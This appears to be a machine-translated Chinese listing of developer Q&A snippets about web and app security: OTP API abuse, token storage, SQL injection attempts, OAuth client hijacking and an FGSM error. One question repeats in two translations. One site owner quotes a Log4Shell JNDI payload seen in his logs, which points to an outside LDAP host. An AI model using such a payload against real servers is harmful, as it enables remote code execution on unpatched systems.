客户端保护令牌漏洞循环困境
作者:sabri mahmoud 提问时间:10/26/2023
很抱歉,这个问题需要很长,这样你才能理解问题,这绝对是相对于我的问题的大小,我正在寻求网络安全专家的意见,所以提前感谢您抽出时间。 I) 背景 我的问题与 Google Analytics 的相同...
攻击 问答列表
在用户通过身份验证之前停止 API 滥用
作者:Thoughtful Monkey 提问时间:8/18/2022
我们有一个 Android 应用程序。用户需要使用基于短信的OTP登录,然后才能使用应用程序。 我们对 OTP 的请求是公共 API。攻击者已开始滥用此 API。与实际用户相比,API 调用次数增加...
客户端保护令牌漏洞循环困境
作者:sabri mahmoud 提问时间:10/26/2023
很抱歉,这个问题需要很长,以便您可以理解问题,并且它绝对是相对于我的问题的大小而言的,我正在寻求网络安全专家的意见,因此感谢您提前抽出时间。 I) 背景 在Google Analytics的相同上...
使用 fgsm 的对抗性攻击中的错误:- ValueError:尝试将类型不受支持的类型 (<class 'NoneType'>) 的值 (None) 转换为张量
作者:Bhanu Teja Pogiri 提问时间:10/25/2023
我正在MNIST数据集上使用FGSM生成对抗性攻击示例。 这是我的fgsm_attack_generation代码: def fgsm_attack(model, data, epsilon):...
从服务器端重定向浏览器
作者:Agustin Nuñez 提问时间:10/6/2023
在我基于 Vue + Nuxt 2 构建的页面中,我试图执行从一个页面到另一个页面的重定向,以防不允许用户看到该页面。 现在,为了实现这一点,我调用了一个端点,并依靠其响应来管理重定向,特别是在键“...
网站攻击:${jndi:ldap:/93.95.216.134:1389/Exploit}
作者:Robert Benedetto 提问时间:10/5/2023
似乎有人试图攻击我的网站。我在博客中看到以下内容受到攻击:${jndi:ldap:/93.95.216.134:1389/Exploit} 似乎来自香港。 我的网站只是抛出 400 个错误,所以它...
阻止 https://example.com/livewire/message/xyz 外部访问
作者:Lorenzo Lorini Kalil 提问时间:9/23/2023
我有一个使用 livewire 的 Web 应用程序,在过去的几周里,我不得不在 Livewire 使用的消息路由上处理大量 SQL 注入尝试。我的问题是:有没有办法防止这种情况发生,我有一个防火墙,...
Localhost JavaScript 捆绑包正在尝试被用户注入我的网站。(由 Sentry 报告,一个错误和性能跟踪工具)
作者:Ela 提问时间:12/30/2021
我在哨兵报告中可以看到, 与我的供应商一起~main-6319dfea084cb55e85bf.js,main-6319dfea084cb55e85bf.js以及其他resource.scripts和...
为什么客户端劫持仅在浏览器在线时有效?
作者:Tyrannogina 提问时间:9/6/2023
我正在阅读基于浏览器的应用程序的 OAuth 2.0 草案,并进入了邮件列表的讨论。在电子邮件中,有这样一段文字: 声明使用被盗令牌与通过 用户浏览器中受损的客户端(客户端劫持)是 绝对错误。以下是...
将访问令牌和刷新令牌保存到本地存储但已加密?
作者:asallan3 提问时间:2/1/2023
我一直在研究使用 ReactJS 进行前端开发,并使用 ASP.NET Core 进行后端开发,作为第一步,我一直在开发身份验证/授权(登录)系统。 我实现了在 1 小时后过期的访问令牌和在 7 天...